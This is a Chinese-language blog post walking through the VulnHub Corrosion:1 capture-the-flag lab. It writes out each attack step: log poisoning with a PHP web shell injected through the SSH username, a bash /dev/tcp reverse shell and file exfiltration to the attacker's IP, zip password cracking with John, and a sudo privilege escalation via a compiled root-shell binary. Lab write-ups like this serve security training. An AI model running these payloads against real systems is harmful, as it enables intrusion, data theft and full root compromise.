VulnHub日记(四):Corrosion

最新推荐文章于 2024-01-10 21:47:32 发布
最新推荐文章于 2024-01-10 21:47:32 发布
阅读量299 收藏
点赞数
分类专栏: VlunHub日记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44107836/article/details/119382561
版权
本文详细介绍了通过nmap扫描、目录枚举、日志注入、PHP代码执行、bash反弹shell、zip文件密码破解以及sudo权限利用,最终实现对VulnHub靶机Corrosion的完全控制的过程。通过这个实战,读者可以学习到多种网络安全攻防技巧。
摘要由CSDN通过智能技术生成

靶机介绍

难度:容易

对于初学者来说,这是一个简单的盒子,但不太容易。祝你好运

提示:枚举属性

虚拟机链接:https://www.vulnhub.com/entry/corrosion-1,730/

参考博客:https://nepcodex.com/2021/08/corrosion-walkthrough-vulnhub-writeup/

开始练习

本机ip:192.168.56.102

使用nmap找出靶机ip:192.168.56.111

nmap -sS -sV 192.168.56.0/24

查看开启端口及服务

nmap -A -p- 192.168.56.111

 看到开启80和22端口,先使用浏览器访问发现是默认页面 ,使用drsearch找目录

dirsearch  -e txt,bak,zip,img,jpg,php,html -u http://192.168.56.111 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -r

访问该页面,看到tasks_todo文件

blog-post目录
 

 

blog-post目录下有子目录

 

打开php文件,需要一个参数,根据提示,使用fuzzing

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/big.txt -u 'http://192.168.19.130/blog-post/archives/randylogs.php?FUZZ=/etc/passwd' -fs 0

得到了file参数,将将参数值设为日志文件目录,尝试访问日志

http://192.168.56.111/blog-post/archives/randylogs.php?file=/var/log/auth.log

尝试在ssh连接时写入php代码到日志文件中

ssh '<?php system($_GET["aaa"]); ?>'@192.168.56.111

 说明日志文件会将ssh用户名作为php代码执行

尝试输入想要获取的信息值,例如uid,目录等

view-source:http://192.168.56.111/blog-post/archives/randylogs.php?file=/var/log/auth.log&aaa=id

view-source:http://192.168.56.111/blog-post/archives/randylogs.php?file=/var/log/auth.log&aaa=ls -al

 确认可以利用后,写bash脚本反弹shell,现在本机监听端口

nc -nvlp 4396

 在日志页写入bash脚本

bash -c 'bash -i >& /dev/tcp/192.168.56.102/4396 0>&1'

直接写入会弹不出shell,需要使用URL编码

bash%20-c%20%27bash%20-i%20>%26%20%2Fdev%2Ftcp%2F192.168.56.102%2F4396%200>%261%27

 在/var/backup目录下发现可疑zip文件

在本机打开另一个监听端口用于获取文件

nc -nvlp 4397

shell处执行命令,完成传输

cat user_backup.zip > /dev/tcp/192.168.56.102/4397

发现解压需要输入密码,使用zip2john暴力破解

zip2john user.zip | tee hash 
john hash --wordlist=/root/Desktop/rockyou.txt
john has --show

 

 查看其余三个文件没有有用信息,得到用户密码,使用ssh登录,拿到用户FLAG

ssh -l randy 192.168.56.111

 

 

 开始提权,先查看免root密码执行的命令

sudo -l

这个文件与之前在zip文件中的c语言程序功能相同,没有发现用处

由于不能编辑该文件,查看提示我们有权限更改二进制目录,于是编写一个c文件,使用gcc将此文件编译覆盖easysysinfo ,再次执行就可以完成提权

cat > 4396.c
#include <unistd.h>
#include <stdlib.h>

void main()
{
  setuid(0);
  setgid(0);
  system("bash -i");
}


gcc 4396.c -o easysysinfo
sudo ./easysysinfo

在/root下拿到FLAG

 

 

Dawn_Xiiii
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VulnHub靶场-Corrosion:1
hxync的博客
08-14 639
靶场下载地址:Corrosion:1 下载好之后导入virtualbox启动 Kali IP地址: Nmap扫描靶机IP: Nmap扫端口: 浏览器访问80端口: 没发现什么有用的信息 Dirbuster扫目录: 访问一下扫到的内容,发现了txt文件里似乎有提示信息 推测是在登录日志中可能存在文件包含 Fuzz找下参数: ssh登录尝试一下: 发现确实存在文件包含,上传一句话木马: 命令执行成功: 反弹shell 先监听端口 url编码: 成功拿到shell 在/var/ba
corrosion:Eclipse Corrosion-Eclipse IDE中的Rust版本
05-04
Corrosion是Eclipse IDE的Rust开发插件,通过与Rust Analyzer语言服务器,CargoRunner和gdb调试器集成,提供了丰富的版本体验。 下载/安装 腐蚀 从成熟的Eclipse IDE进行Rust开发。 或者 在您的计算机上正确安装了...
VulnHUb日记(十): Corrosion:2
Dawn_Xi的博客
11-25 470
参考链接 Vulnhub:Corrosion:2 参考博客 开始练习 本机ip:192.168.56.102 目的机ip:192.168.56.135 fping 192.168.56.0/24 nmap 扫描主机 nap-A -v -p- 192.168.56.135 开启了80和8080两个http服务,分别访问 gobuster 枚举目录,在8080端口目录下 gobuster dir --url 192.168.56.135:8080 -w /usr/share/seclists/Disco
vulnhub靶机-Corrosion
臭nana的博客
08-16 702
1、找到靶机ip:192.168.162.131 nmap -sn 192.168.162.0/24 2、扫描靶机端口,发现开放22和80端口 ┌──(root????cracer)-[~] └─# nmap -A -p- 192.168.162.131 Starting Nmap 7.91 ( https://nmap.org ) Nmap scan report for 192.168.162.131 Host is up (0.00067s latency).
vulnhub靶机-Corrosion:2
臭nana的博客
05-03 649
1、找到靶机ip:192.168.1.106 nmap -sn 192.168.1.0/24 2、扫描靶机端口,开放22、80和8080端口
vulnhub-Corrosion: 2
qq_43006864的博客
05-12 513
Corrosion: 2 ~ VulnHub 靶机:Corrosion: 2 ~ VulnHub 攻击机: Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux 信息收集: nmap -sS -sV -A -p- 192.168.1.108 主机开放了三个端口。 访问一下80和8080 分别是Apache和Tomcat中间件的界面。没啥发现,开始目.
Vulnhub靶机:Corrosion 2
qq_48904485的博客
01-10 953
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:corrosion:2(10.0.2.13)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/corrosion-2,745/
Vulnhub靶场】CORROSION: 2
DG_s1mple
02-12 2096
环境准备 下载好靶机后导入到vmware里面 这没啥好说的 题目没给IP地址需要我们自己探测 攻击机IP地址为:192.168.2.16 靶机IP地址为:192.168.2.17 信息收集 使用arp-scan命令扫描靶机的IP地址 使用namp扫描靶机开放的端口 靶机开放了ssh和tomcat 渗透开始 首先访问80端口 很正常的一个页面,没有什么有用的信息,扫描路径也没有什么有用的结果 我们再访问8080端口 是一个tomcat的页面,我们也扫描一下路径 我们访问一下readme.txt
Corrosion:使用机器学习预测腐蚀速率
05-10
"Corrosion: 使用机器学习预测腐蚀速率"这个项目聚焦于利用这种技术来解决材料腐蚀的问题,这是工程领域的一大挑战。腐蚀会降低设备的寿命,增加维护成本,因此准确预测腐蚀速率对于预防性维护和设计更耐腐蚀的材料...
corrosion:用于Rust的高性能缓存库
03-05
"腐蚀"(Corrosion)是一个专为Rust设计的高性能缓存库,它提供了多种数据结构和算法,以支持快速且内存效率高的数据存储。下面将详细讨论这个库的主要特点、功能以及如何在实际应用中使用它。 1. **设计原则与特性...
corrosion:一组用于Rust的测试实用程序
05-13
"corrosion"项目就是针对这种情况而设计的一组Rust测试实用程序,它旨在扩展和增强Rust的标准测试框架,为开发者提供更多的工具和便利。 首先,我们来看一下Rust内置测试框架的基础知识。Rust通过`#[test]`属性来...
46244-130838-1-SM_corrosion_
09-29
《腐蚀检测方法的比较》 腐蚀,作为材料与环境相互作用的一种自然现象,对工业设备和基础设施的安全性、可靠性和使用寿命具有重大影响。在工程领域,有效地检测和预防腐蚀至关重要。本文将深入探讨并比较几种常见的...
vulnhub-Corrosion: 1
qq_43006864的博客
05-10 681
Corrosion: 1 ~ VulnHub 靶机: 攻击机: Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux 信息收集: nmap 192.168.1.1/24 由于这个靶机没有给出ip地址,这里需要自己扫描,这里根据他开放的22和80端口判断,192.168.1.102这台机是靶机。因为我这就这么几台电脑。 继续扫描 nmap -sS -s..
Vulnhub靶场 Corrosion: 2靶机 渗透练习一
weixin_52244898的博客
07-07 1082
前期准备: 靶机地址:Corrosion: 2 ~ VulnHub kali攻击机ip:192.168.122.128 靶机地址:192.168.122.143 一、信息收集 1.使用 netdiscover 探测目标 ip 2.使用 nmap 对目标靶机进行端口扫描 发现开放了22端口(ssh)、80端口(http)和8080端口(http) 3. 80 端口 访问 80 端口: 很正常的一个页面,没发现什么可利用信息 扫描一下目........
vulnhub靶场——CORROSION:2
Czheisenberg的博客
02-16 3142
vulnhub靶场——CORROSION:2 Wirteup
Vulnhub靶机:Corrosion1
qq_48904485的博客
01-09 472
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:corrosion:1(10.0.2.12)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/corrosion-1,730/
[渗透测试学习靶机04] vulnhub靶场 Corrosion: 2
weixin_47112073的博客
10-17 613
渗透测试学习靶机04-vulnhub靶场 Corrosion: 2本次靶机难度:中等。
看完这篇 教你玩转渗透测试靶机vulnhubCorrosion:1
Aluxian_的博客
06-24 1750
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。Easy。
计算机网络实验三:UDP协议探索和分析
最新发布
08-24
【实验目的】 1、掌握UDP协议数据格式; 2、掌握UDP首部各字段含义; 3、了解网卡offload技术; 4、熟悉Linux下nc命令的使用方法。
全面解析:机械专业英语词汇大全
3. **电化学腐蚀 (Electrochemical corrosion)**:金属在电解质环境中因电子转移而发生的腐蚀过程,涉及到氧化和还原反应。 4. **车架 (Automotive chassis)**:汽车的基础结构,支撑着车辆的所有部件,包括发动机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值